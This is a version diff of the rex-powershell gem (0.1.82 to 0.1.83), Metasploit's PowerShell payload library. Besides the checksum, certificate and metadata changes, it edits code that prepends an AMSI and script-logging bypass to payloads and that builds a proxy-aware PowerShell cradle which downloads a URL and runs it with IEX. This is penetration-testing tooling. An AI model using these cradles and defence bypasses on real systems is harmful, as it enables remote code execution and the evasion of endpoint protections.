rex-powershell 0.1.82 → 0.1.83
- checksums.yaml +5 -5
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/lib/rex/powershell/command.rb +7 -3
- data/lib/rex/powershell/psh_methods.rb +17 -3
- data/lib/rex/powershell/version.rb +1 -1
- metadata +79 -74
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
|
-
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: 421ac28e512865c91044739b0da3ab0760e80c4f4df966cbf39a935c1d083f3c
|
4
|
+
data.tar.gz: d5e958eaa5539f183d67543b3feaa4b9f489f2868882032cb43d6d9f30f82668
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: a545a48c3e0515cd897155304736db6749877453abc5fc07e9c3e7cc84ef6417e5bda0a2523ec0e43dc9ff93dc40fecb31f004f5a84bfca75e6cb7b34f8f5946
|
7
|
+
data.tar.gz: 4c1ae7b605031e7cbe433b62a1a916d5bdef4322910035929baa3982de6a247a1133e11a747cf06dd35f110ed752fa62150199885afa1318c59efc30c2c5cfea
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
@@ -316,11 +316,13 @@ EOS
|
|
316
316
|
end
|
317
317
|
end
|
318
318
|
|
319
|
+
compressed_payload = compress_script(psh_payload, nil, opts)
|
320
|
+
|
319
321
|
if opts[:prepend_protections_bypass]
|
320
|
-
|
322
|
+
bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
|
323
|
+
compressed_payload = bypass_amsi + ";" + compressed_payload
|
321
324
|
end
|
322
325
|
|
323
|
-
compressed_payload = compress_script(psh_payload, nil, opts)
|
324
326
|
encoded_payload = encode_script(psh_payload, opts)
|
325
327
|
|
326
328
|
# This branch is probably never taken...
|
@@ -372,7 +374,9 @@ EOS
|
|
372
374
|
end
|
373
375
|
psh_command = generate_psh_command_line(command_args)
|
374
376
|
|
375
|
-
if opts[:
|
377
|
+
if opts[:exec_in_place] and (not opts[:encode_final_payload] and not opts[:encode_inner_payload])
|
378
|
+
command = final_payload
|
379
|
+
elsif opts[:remove_comspec]
|
376
380
|
command = psh_command
|
377
381
|
else
|
378
382
|
command = "%COMSPEC% /b /c start /b /min #{psh_command}"
|
@@ -124,12 +124,12 @@ module Powershell
|
|
124
124
|
#
|
125
125
|
# @return [String] PowerShell code to disable PowerShell Built-In Protections
|
126
126
|
def self.bypass_powershell_protections()
|
127
|
-
%Q{
|
127
|
+
uglify_ps(%Q{
|
128
128
|
If($PSVersionTable.PSVersion.Major -ge 3){
|
129
129
|
#{self.bypass_script_log}
|
130
130
|
#{self.bypass_amsi}
|
131
131
|
}
|
132
|
-
}
|
132
|
+
})
|
133
133
|
end
|
134
134
|
|
135
135
|
#
|
@@ -147,6 +147,14 @@ module Powershell
|
|
147
147
|
end
|
148
148
|
end
|
149
149
|
|
150
|
+
#
|
151
|
+
# Force use of TLS1.2
|
152
|
+
#
|
153
|
+
# @ return [String] Powershell code to force use of TLS1.2
|
154
|
+
def self.force_tls12()
|
155
|
+
%Q^[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;^
|
156
|
+
end
|
157
|
+
|
150
158
|
#
|
151
159
|
# Use the default system web proxy and credentials to download a URL
|
152
160
|
# as a string and execute the contents as PowerShell
|
@@ -158,15 +166,21 @@ module Powershell
|
|
158
166
|
def self.proxy_aware_download_and_exec_string(url, iex = true)
|
159
167
|
var = Rex::Text.rand_text_alpha(1)
|
160
168
|
cmd = "$#{var}=new-object net.webclient;"
|
169
|
+
cmd << "if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){"
|
161
170
|
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
162
171
|
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
172
|
+
cmd << "};"
|
163
173
|
if iex
|
164
|
-
cmd << "IEX $#{var}.
|
174
|
+
cmd << "IEX ([System.Text.Encoding]::ASCII.GetString($#{var}.downloaddata('#{url}')));"
|
165
175
|
else
|
166
176
|
cmd << "&([scriptblock]::create($#{var}.downloadstring('#{url}'));"
|
167
177
|
end
|
168
178
|
cmd
|
169
179
|
end
|
180
|
+
|
181
|
+
def self.uglify_ps(script)
|
182
|
+
return script.gsub(/\ +/, " ").gsub(/\n+/, '')
|
183
|
+
end
|
170
184
|
end
|
171
185
|
end
|
172
186
|
end
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.83
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- David 'thelightcosine' Maloney
|
@@ -10,85 +10,90 @@ bindir: exe
|
|
10
10
|
cert_chain:
|
11
11
|
- |
|
12
12
|
-----BEGIN CERTIFICATE-----
|
13
|
-
|
14
|
-
|
15
|
-
|
16
|
-
|
17
|
-
|
18
|
-
|
19
|
-
|
20
|
-
|
21
|
-
|
22
|
-
|
23
|
-
|
24
|
-
|
25
|
-
|
26
|
-
|
27
|
-
|
28
|
-
|
29
|
-
|
30
|
-
|
31
|
-
|
13
|
+
MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl
|
14
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
15
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
16
|
+
b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG
|
17
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
18
|
+
cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi
|
19
|
+
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c
|
20
|
+
JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP
|
21
|
+
mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+
|
22
|
+
wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4
|
23
|
+
VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/
|
24
|
+
AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB
|
25
|
+
AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
|
26
|
+
BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun
|
27
|
+
pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC
|
28
|
+
dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf
|
29
|
+
fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm
|
30
|
+
NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx
|
31
|
+
H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe
|
32
|
+
+o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g==
|
32
33
|
-----END CERTIFICATE-----
|
33
34
|
- |
|
34
35
|
-----BEGIN CERTIFICATE-----
|
35
|
-
|
36
|
-
|
37
|
-
|
38
|
-
|
39
|
-
|
40
|
-
|
41
|
-
|
42
|
-
|
43
|
-
|
44
|
-
|
45
|
-
|
46
|
-
|
47
|
-
|
48
|
-
|
49
|
-
|
50
|
-
|
51
|
-
|
52
|
-
|
53
|
-
|
54
|
-
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
36
|
+
MIIFMDCCBBigAwIBAgIQBAkYG1/Vu2Z1U0O1b5VQCDANBgkqhkiG9w0BAQsFADBl
|
37
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
38
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
39
|
+
b3QgQ0EwHhcNMTMxMDIyMTIwMDAwWhcNMjgxMDIyMTIwMDAwWjByMQswCQYDVQQG
|
40
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
41
|
+
cnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBT
|
42
|
+
aWduaW5nIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+NOzHH8O
|
43
|
+
Ea9ndwfTCzFJGc/Q+0WZsTrbRPV/5aid2zLXcep2nQUut4/6kkPApfmJ1DcZ17aq
|
44
|
+
8JyGpdglrA55KDp+6dFn08b7KSfH03sjlOSRI5aQd4L5oYQjZhJUM1B0sSgmuyRp
|
45
|
+
wsJS8hRniolF1C2ho+mILCCVrhxKhwjfDPXiTWAYvqrEsq5wMWYzcT6scKKrzn/p
|
46
|
+
fMuSoeU7MRzP6vIK5Fe7SrXpdOYr/mzLfnQ5Ng2Q7+S1TqSp6moKq4TzrGdOtcT3
|
47
|
+
jNEgJSPrCGQ+UpbB8g8S9MWOD8Gi6CxR93O8vYWxYoNzQYIH5DiLanMg0A9kczye
|
48
|
+
n6Yzqf0Z3yWT0QIDAQABo4IBzTCCAckwEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNV
|
49
|
+
HQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUHAwMweQYIKwYBBQUHAQEEbTBr
|
50
|
+
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wQwYIKwYBBQUH
|
51
|
+
MAKGN2h0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJ
|
52
|
+
RFJvb3RDQS5jcnQwgYEGA1UdHwR6MHgwOqA4oDaGNGh0dHA6Ly9jcmw0LmRpZ2lj
|
53
|
+
ZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwOqA4oDaGNGh0dHA6
|
54
|
+
Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmww
|
55
|
+
TwYDVR0gBEgwRjA4BgpghkgBhv1sAAIEMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
56
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCgYIYIZIAYb9bAMwHQYDVR0OBBYEFFrEuXsq
|
57
|
+
CqOl6nEDwGD5LfZldQ5YMB8GA1UdIwQYMBaAFEXroq/0ksuCMS1Ri6enIZ3zbcgP
|
58
|
+
MA0GCSqGSIb3DQEBCwUAA4IBAQA+7A1aJLPzItEVyCx8JSl2qB1dHC06GsTvMGHX
|
59
|
+
fgtg/cM9D8Svi/3vKt8gVTew4fbRknUPUbRupY5a4l4kgU4QpO4/cY5jDhNLrddf
|
60
|
+
RHnzNhQGivecRk5c/5CxGwcOkRX7uq+1UcKNJK4kxscnKqEpKBo6cSgCPC6Ro8Al
|
61
|
+
EeKcFEehemhor5unXCBc2XGxDI+7qPjFEmifz0DLQESlE/DmZAwlCEIysjaKJAL+
|
62
|
+
L3J+HNdJRZboWR3p+nRka7LrZkPas7CM1ekN3fYBIM6ZMWM9CBoYs4GbT8aTEAb8
|
63
|
+
B4H6i9r5gkn3Ym6hU/oSlBiFLpKR6mhsRDKyZqHnGKSaZFHv
|
60
64
|
-----END CERTIFICATE-----
|
61
65
|
- |
|
62
66
|
-----BEGIN CERTIFICATE-----
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
81
|
-
|
82
|
-
|
83
|
-
|
84
|
-
|
85
|
-
|
86
|
-
|
87
|
-
|
88
|
-
|
89
|
-
|
67
|
+
MIIFIzCCBAugAwIBAgIQDX9ZkVJ2eNVTlibR5ALyJTANBgkqhkiG9w0BAQsFADBy
|
68
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
69
|
+
d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
|
70
|
+
SUQgQ29kZSBTaWduaW5nIENBMB4XDTE5MTAxNjAwMDAwMFoXDTIwMTAxOTEyMDAw
|
71
|
+
MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
|
72
|
+
BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
|
73
|
+
IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANHnKegPAghKuZk4
|
74
|
+
Gy1jKaZEXbWc4fxioTemv/F1yIYzAjCWP65qjKtyeeFDe4/kJzG9nseF9oa93YBf
|
75
|
+
1nyEqxNSZMw/sCAZ87lOl713dRi73uxOoszy2PT5xEB+Q5R6cbzExkWG2zrLdXDr
|
76
|
+
so0Bd6VHw+IsAoBBkAq5FrZOJQYGn5VY20xw/2DqtCeoW4QDWyqTnbJmwO9tZrfr
|
77
|
+
3Le2crfk2eOgafaPNhLon5uuIKCZsk2YkUSNURSS3M7gosMwU9Gg4JTBi7X5+oww
|
78
|
+
rY43dJT28YklxmNVu8o5kJxW4dqLKJLOIgSXZ63nceT/EaCSg7DcofHNcUzejFwb
|
79
|
+
M7Zbb2kCAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
|
80
|
+
dQ5YMB0GA1UdDgQWBBR18CAeMsIEU+0pXal/XXw9LCtMADAOBgNVHQ8BAf8EBAMC
|
81
|
+
B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
|
82
|
+
L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
|
83
|
+
L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
|
84
|
+
MEwGA1UdIARFMEMwNwYJYIZIAYb9bAMBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
85
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQQBMIGEBggrBgEFBQcBAQR4MHYw
|
86
|
+
JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
|
87
|
+
AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
|
88
|
+
ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
|
89
|
+
BQADggEBAFpzR9s7lcYKDzSJucOHztEPj+iSIeCzxEw34NTE9M2AfkYIu82c4r2a
|
90
|
+
bzIGmzZWiCGufjOp0gF5xW6sSSJ9n0TqH0nhHhvjtZQkmkGtOBbN1zeYDFS2ozAp
|
91
|
+
sljF/g68Y1eYs3NaFf7kQUa6vb6RdjW3J8M9AQ8gthBt7gr/guVxd/gJUYbdDdBX
|
92
|
+
cWfJJi/X7GVBOBmmvA43qoKideuhOBrVGBHvIF/yO9p23dIiUrGmW9kxXCSxgute
|
93
|
+
JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
|
94
|
+
DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
|
90
95
|
-----END CERTIFICATE-----
|
91
|
-
date: 2019-
|
96
|
+
date: 2019-11-18 00:00:00.000000000 Z
|
92
97
|
dependencies:
|
93
98
|
- !ruby/object:Gem::Dependency
|
94
99
|
name: bundler
|
@@ -212,7 +217,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
212
217
|
version: '0'
|
213
218
|
requirements: []
|
214
219
|
rubyforge_project:
|
215
|
-
rubygems_version: 2.
|
220
|
+
rubygems_version: 2.7.10
|
216
221
|
signing_key:
|
217
222
|
specification_version: 4
|
218
223
|
summary: Rex Powershell Utilities
|
metadata.gz.sig
CHANGED
Binary file
|